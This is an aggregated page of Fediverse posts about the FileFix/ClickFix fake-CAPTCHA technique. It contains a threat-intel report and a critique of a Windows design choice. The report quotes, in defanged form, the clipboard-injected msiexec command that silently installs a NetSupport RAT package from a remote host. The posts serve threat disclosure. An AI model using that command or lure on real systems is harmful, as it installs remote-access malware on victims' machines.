home.social

#filefix — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #filefix, aggregated by home.social.

  1. 2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

    While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

    #clipboardhijacking Script injected into clipboard:

    msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

    The downloaded file is an MSI for #NetSupportRAT

    virustotal.com/gui/file/958586

  3. @campuscodi The "#FileFix" technique has a nonsensical name, but the design decision by #Microsoft which makes it possible is absolutely ridiculous. It at least makes sense to let the user run an executable from the "Run" dialog; letting the user run an executable from the Location bar makes no sense. What conceivable use case did some engineer have in mind? Or did they just re-use an API without thinking?

    They implemented a security defect by design, by violating the Principle of Least Astonishment. Microsoft never ceases to amaze.

    en.wikipedia.org/wiki/Principl

    #humanFactor #POLA